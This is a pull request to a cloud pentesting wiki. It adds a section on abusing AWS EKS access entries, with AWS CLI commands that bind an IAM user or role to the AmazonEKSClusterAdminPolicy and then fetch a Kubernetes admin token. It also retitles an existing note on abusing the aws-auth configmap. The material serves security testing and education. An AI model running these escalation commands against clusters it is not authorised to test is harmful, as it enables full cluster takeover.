### PR TITLE
Added access entry abuse to pivot from AWS to Kubernetes

### DIFF
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation/README.md
@@ -80,7 +80,9 @@ users:
 
 The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**.
 
-The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
+#### Abusing configmap
+
+The traditional way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
 
 > [!WARNING]
 > Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**.
@@ -88,6 +90,30 @@ The way to grant **access to over K8s to more AWS IAM users or roles** is using 
 For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#aws-eks-aws-auth-configmaps).
 
 Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**.
+
+#### Abusing Access Entries
+
+AWS implementes an additional way to grant IAM users access to the Kubernetes cluster through access entries. If you have the `eks:CreateAccessEntry` and `eks:AssociateAccessPolicy` permissions, you may also be able to assign a Kubernetes administrator role to either your user or a specific rol.
+
+First, **create an access entry for your user or role**:
+
+```
+aws eks create-access-entry --cluster-name <cluster_name> --region <region> --principal-arn <arn_from_your_user_or_role> --type STANDARD
+```
+
+With that entry created, you may now be able to assign a policy directly to it. There is a built-in AWS policy called *AmazonEKSClusterAdminPolicy* that may be used directly. Keep in mind that if your environment has some other custom policies that also grant elevated privileges in EKS, you may change the `--policy-arn` to any of those:
+
+```
+aws eks associate-access-policy --cluster-name <cluster_name> --region <region> --principal-arn <arn_from_your_user_or_role> --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster
+```
+
+You can search for this policy in AWS official documentation [**here**](https://docs.aws.amazon.com/eks/latest/userguide/access-policy-permissions.html#access-policy-permissions-amazoneksclusteradminpolicy)
+
+From this point on, you may now be able to request a *k8s* token and interact with the cluster as an administrator:
+
+```
+aws eks get-token --cluster-name <cluster_name> --output json | jq -r '.status.token'
+```
 
 ### From Kubernetes to AWS
 


### PR DESCRIPTION
Added sections on abusing configmap (already existing) and access entries (new) for AWS EKS, including commands for creating access entries and associating access policies.

I have not seen them referenced in the AWS or Kubernetes wikis. As this is AWS-specific, I feel like this section is the one that suits it best.




